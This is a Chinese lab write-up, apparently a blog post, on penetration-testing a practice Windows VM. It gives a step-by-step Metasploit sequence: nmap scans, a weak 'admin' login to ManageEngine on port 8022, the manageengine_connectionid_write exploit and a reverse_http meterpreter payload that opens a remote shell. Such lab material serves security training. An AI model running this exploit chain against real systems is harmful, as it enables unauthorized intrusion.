MSTables3靶机渗透测试(1)- 攻击windows服务器

  • 链接:https://pan.baidu.com/s/1YNnoVbT-SPmvs3YawJpqjQ
    提取码:nx82
    解压文件后用VMware扫描即可
  • 靶机IP地址为192.168.118.4在这里插入图片描述
    攻击方为Kali Linux
    IP地址:192.168.118.1
    在这里插入图片描述
    1.信息收集
    nmap对其进行扫描
msf6 > db_nmap -sV -A -T4 192.168.118.4

在这里插入图片描述
2.查看可以利用的信息

msf6 > services 192.168.118.4

在这里插入图片描述

  • 接下来再全方位的扫一次(追加所有端口)
msf6 > db_nmap -sV -A -p 1-65535 192.168.118.4

在这里插入图片描述

  • 再次得到信息
    在这里插入图片描述
    3.尝试访问8022端口
    浏览器输入:http://192.168.118.4:8022
    在这里插入图片描述
  • 是一个继承桌面和设备管理软件
  • 使用弱口令admin可登录
    在这里插入图片描述
    4.接下来搜索可用于攻击的模块:manageengine
msf6 > search manageengine

在这里插入图片描述
共找到26个。

  • 使用第25
msf6 > use exploit/windows/http/manageengine_connectionid_write

在这里插入图片描述

  • 设置主机地址:
msf6 exploit(windows/http/manageengine_connectionid_write) > set rhosts 192.168.118.4
rhosts => 192.168.118.4

在这里插入图片描述

  • 再搜索:search reverse_http
msf6 exploit(windows/http/manageengine_connectionid_write) > search reverse_http

在这里插入图片描述

  • 使用第46
msf6 exploit(windows/http/manageengine_connectionid_write) > set payload payload/windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http

在这里插入图片描述

  • 设置端口
msf6 exploit(windows/http/manageengine_connectionid_write) > set rport 8022
rport => 8022

在这里插入图片描述

  • 开始
msf6 exploit(windows/http/manageengine_connectionid_write) > exploit

成功连接!
在这里插入图片描述

  • 输入windows命令ipconfig可查看信息
    在这里插入图片描述
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值